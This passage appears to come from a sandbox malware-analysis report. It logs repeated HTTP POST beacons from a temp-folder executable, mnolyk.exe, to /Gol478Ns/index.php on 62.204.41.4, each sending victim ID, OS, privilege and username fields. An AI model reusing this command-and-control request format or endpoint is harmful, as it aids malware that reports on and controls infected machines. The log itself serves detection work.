                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:13.132714033 CET887INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          733192.168.2.65045862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:13.302773952 CET888OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:13.366125107 CET888INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          734192.168.2.65045962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:13.538197994 CET889OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:13.602175951 CET889INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          735192.168.2.65046062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:13.772289991 CET890OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:13.834223032 CET890INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          736192.168.2.65046162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:14.005419970 CET891OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:14.070334911 CET891INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:14 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          737192.168.2.65046262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:14.252135992 CET892OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:14.315682888 CET892INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:14 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          738192.168.2.65046362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:14.491802931 CET893OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:14.555496931 CET893INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:14 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          739192.168.2.65046462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:14.739715099 CET894OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:14.805259943 CET894INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:14 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          74192.168.2.64979462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:11.263709068 CET194OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:11.326148033 CET194INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          740192.168.2.65046562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:14.989651918 CET895OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:15.055737972 CET895INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:15 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          741192.168.2.65046662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:15.238348961 CET896OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:15.304383993 CET896INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:15 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          742192.168.2.65046762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:15.494808912 CET897OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:15.559283018 CET897INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:15 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          743192.168.2.65046862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:15.743630886 CET898OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:15.807982922 CET898INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:15 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          744192.168.2.65046962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:16.004547119 CET899OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:16.073323011 CET899INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:16 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          745192.168.2.65047062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:16.255517960 CET900OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:16.320497990 CET900INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:16 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          746192.168.2.65047162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:16.488079071 CET901OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:16.553069115 CET901INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:16 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          747192.168.2.65047262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:16.721903086 CET902OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:16.785454988 CET902INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:16 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          748192.168.2.65047362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:16.958101034 CET903OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:17.023379087 CET903INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:16 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          749192.168.2.65047462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:17.216226101 CET904OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:17.282707930 CET904INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:17 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          75192.168.2.64979562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:11.503277063 CET195OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:11.565735102 CET195INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          750192.168.2.65047562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:17.464492083 CET905OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:17.529103041 CET905INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:17 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          751192.168.2.65047662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:17.709098101 CET906OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
